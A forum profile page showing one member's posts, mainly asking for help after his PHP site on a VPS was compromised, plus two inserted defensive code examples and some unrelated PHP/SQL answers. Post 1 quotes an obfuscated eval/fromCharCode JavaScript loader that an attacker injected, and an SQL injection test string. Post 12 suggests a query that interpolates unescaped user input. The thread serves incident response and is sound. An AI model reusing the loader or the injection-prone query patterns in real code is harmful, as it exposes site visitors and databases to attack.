tommyboy123x

Members
  • Posts

    106
  • Joined

  • Last visited

About tommyboy123x

  • Birthday 03/04/1981

Contact Methods

  • AIM
    keepitguilleaume
  • Website URL
    http://www.dollarhauler.com/

Profile Information

  • Gender
    Male
  • Location
    Scottsdale, AZ

tommyboy123x's Achievements

Member

Member (2/5)

0

Reputation

  1. Damn, thank you so much dark.... I didn't realize how out of touch I was. I also wanted to give an update here - the attacker has attempted two other times to add some obfuscated javascript code in the js files... this is becoming a serious problem.

     try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}
     a="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";
     z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}
     eval(ss["fr"+"omCharCode"].apply(ss,z));

     How are you testing these injections? Are you convinced this is the cause of these attacks? When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect. I'll be back in a few days with the changes.
  2. Could you elaborate? As far as I'm aware, there is no way to add an SQL injection on this form... it does pass the data without mysql_real_escape_string but it also converts it into an md5 hash before adding to an SQL line. I also believe this may have been possible because of my lax permission set. A lot of these files were 775 by default, and I think 640 is really what I want. Could this have been the cause? I still can't find the PHP logs, can anyone tell me where to find clues that can help me piece together what happened? It is a Debian squeeze environment.
  3. It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings). I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time. It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start. I believe the attacker may have used this to gain write permissions. I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this. Anyways, login.php should be fixed for this particular exploit. I'll keep this tab open and post in a couple weeks when I do a complete analysis.
  4. Thanks for the help - I thought login.php used mysql_real_escape_string. A few years back I went through pretty carefully looking for XSS possibilities and other things like that, this must have been updated since then. I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possibilities. Thanks!
  5. I have this in my apache logs:

     [Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat

     as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config). In the access log I have this:

     96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"
     96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$
     77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$

     Still trying to track down my php error logs based on my php.ini files, I'll edit if found but is any of this suspicious to you?
  6. I'm not sure this is the right place to post this, but here it goes... There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file. The PHP is as follows:

     <? #0f2490# echo('<img src=\"http://localhost/\" >'); #/0f2490# ?>

     and on all my javascript files:

     /*0f2490*/ document.write('<img src="http://localhost/" >'); /*0f2490*/

     The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581 Was my server compromised? What steps can I take to ensure this doesn't happen again? It's on a VPS I manage, so I wouldn't be too surprised if I ****ed something up, let me know what (if any) access logs you think may be relevant or even where to begin with this problem. Thanks!
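A first-pass triage script for the situation in posts 2, 3 and 6 (injected "0f2490" marker, files changed on a known date, group-writable web root shared with the FTP account). This is an added example, not code from the thread; the web root path and the cutoff date are assumed values.

```php
<?php
// Added example, not from the thread: report files under the web root that
// carry the injected marker, that changed on or after a cutoff date, or that
// the apache group / anyone else may write to. $root and $since are assumed.

function triageWebRoot(string $root, string $since, string $marker = '0f2490'): array
{
    $cutoff = strtotime($since);
    $findings = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $reasons = [];
        $perms = $file->getPerms() & 0777;
        // Mode 775 with the FTP account in the apache group (as in the posts)
        // means a compromise of either account can rewrite every script.
        if ($perms & 0022) {
            $reasons[] = sprintf('group/other writable (%04o)', $perms);
        }
        // ctime changes on any write or chmod and, unlike mtime, cannot be
        // reset with touch, so it is the better timestamp for a timeline.
        if ($file->getCTime() >= $cutoff) {
            $reasons[] = 'changed ' . date('Y-m-d H:i:s', $file->getCTime());
        }
        if (in_array(strtolower($file->getExtension()), ['php', 'js', 'html', 'htm'], true)) {
            $contents = file_get_contents($file->getPathname());
            if ($contents !== false && strpos($contents, $marker) !== false) {
                $reasons[] = "contains marker $marker";
            }
        }
        if ($reasons !== []) {
            $findings[$file->getPathname()] = $reasons;
        }
    }
    ksort($findings);
    return $findings;
}

// Change times line up with the access-log timestamps from the same day,
// which narrows down which request did the writing.
foreach (triageWebRoot('/var/www', '2013-07-26') as $path => $reasons) {
    echo $path, ': ', implode('; ', $reasons), PHP_EOL;
}
```

Run it as a user that can read the whole tree (e.g. via the CLI, not through the web server), and compare the reported change times against the access log before touching any file.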
  7. Eureka! I found out you need to send something to the browser in order to check if it is still alive - I chose "echo chr(0);" but you can also use echo "\n"; from what I hear. Tom
  8. I'm not sure what PHP considers an "aborted connection" and things like that, but the way this chat works is by updating a file and using the timestamp off it to determine if new posts exist. Rather than re-checking the server over and over, this code will check once and keep the connection open until a response is made. The only problem is, it works too well! Even after the tab is closed and I try another script on the site or the same script, it all hangs until I update the file - here is the code snippet:

     while (($currentmodif <= $lastmodif) && (connection_aborted() == 0) && (connection_status() == 0)) {
         // check if the data file has been modified
         usleep(10000); // sleep 10ms to unload the CPU
         if (connection_aborted()) break;
         if (connection_status() != 0) break;
         clearstatcache();
         $currentmodif = filemtime($filename);
     }

     I have put several measures in to attempt to break the loop when the user disconnects, but it just doesn't work! It will continue to hang and hang and hang until I re-upload the file $filename. HOW CAN I BREAK THE WHILE LOOP WHEN THE MEMBER LEAVES THE PAGE? I could post up an example but it's ultimately useless after one load unless you have control over updating the file. Thanks!
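The wait loop from posts 7 and 8, rewritten as an added example (not the poster's code) so that it notices a departed client and, just as importantly, never holds a PHP worker for longer than a fixed timeout. The data file path, the query parameter and the timeout are assumed values.

```php
<?php
// Added example, not the poster's code: long-poll wait on the chat data file
// that detects a closed client and always gives up after $maxSeconds.
// $filename, the 'timestamp' parameter and the timeout are assumed values.

function waitForChatUpdate(string $filename, int $lastmodif, int $maxSeconds = 25): ?int
{
    // Every blocked request pins a PHP worker, so a client that is never
    // detected as gone (proxies may buffer output) must still be released.
    set_time_limit($maxSeconds + 5);
    $deadline = time() + $maxSeconds;

    clearstatcache(true, $filename);
    $currentmodif = filemtime($filename);

    while ($currentmodif <= $lastmodif && time() < $deadline) {
        // connection_aborted()/connection_status() only change after a write
        // to the socket fails, which is why the original loop never exited:
        // it never wrote anything. Send a harmless byte and push it out.
        echo "\n";
        if (ob_get_level() > 0) {
            ob_flush();
        }
        flush();
        // With ignore_user_abort() at its default (false) PHP stops the script
        // on a failed write; the explicit check covers the case where it is on.
        if (connection_aborted() || connection_status() !== CONNECTION_NORMAL) {
            return null;
        }
        usleep(250000); // 250 ms between stat() calls keeps CPU and traffic low
        clearstatcache(true, $filename);
        $currentmodif = filemtime($filename);
    }
    return $currentmodif > $lastmodif ? $currentmodif : null;
}

// Headers must go out before the first keep-alive byte is echoed.
header('Content-Type: application/json');
$lastmodif = isset($_GET['timestamp']) ? (int) $_GET['timestamp'] : 0;
$result = waitForChatUpdate('/var/www/chat/data.txt', $lastmodif);
echo json_encode($result === null ? ['timeout' => true] : ['timestamp' => $result]);
```

The leading newlines are harmless to JSON.parse on the client, but the client must treat a timeout response as "ask again" rather than as an error.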
  9. this might sound dumb, but shouldn't "<?=" be "<?" in the title? could you change that to "<?php" ?
  10. Try unparsing the PHP code when the xampp code begins; One guess I have is that when the xampp code begins, it tries to start a new "<?php" when it has already been opened. I could tell you a little more if I saw the code / website
  11. It would definitely start by naming variables what they should be. I've noticed that it makes things a lot harder once you look back at old code or even when you are debugging. I'm with zanus on this one. Can you explain a bit more of what is going on / what the script does? There must be more than 1 file, right?
  12. I think he's just looking for an easy way to add a few thousand zip codes to a database. I would just make a table with all the places / locations / cities in it you want, then assign zip codes. From there you can have a search that would look like SELECT * FROM zipcodes WHERE zip='$zipcode' ORDER BY location ASC good luck!
  13. I know you said PHP posting was the easiest, but why not just use a simple flash based uploader? You can find tons of those scripts online. PHP isn't really designed to upload big files, unless I'm mistaken =\
  14. Well, mysql is searching literally for '"8/07/%"'. Instead what you want is '"8/07/"%', if that makes any sense? If you want to keep the date how it is formatted but search for only the first part of the date, you need to store date as $date = date ('y/m/'); then the query should look like SELECT * FROM `data` WHERE ... AND `data` LIKE '$date%' ORDER BY id DESC Note your use of "LIKE" instead of "=", and the % wild card at the end of $date. However, for a possibly more efficient way to keep records, store your data in the table as unix timestamps (number of seconds from December 31st 1969 12:00), and search for a date range that would correspond to the particular day you want to find (which in this case would be between 1216267200 and 1216353600). You can find some unix timestamp converters online, use time() to return a unix timestamp, date([FORMATTED DATE], [UNIX TIMESTAMP]) to reverse the process, etc. They are a lot easier to work with in the long run.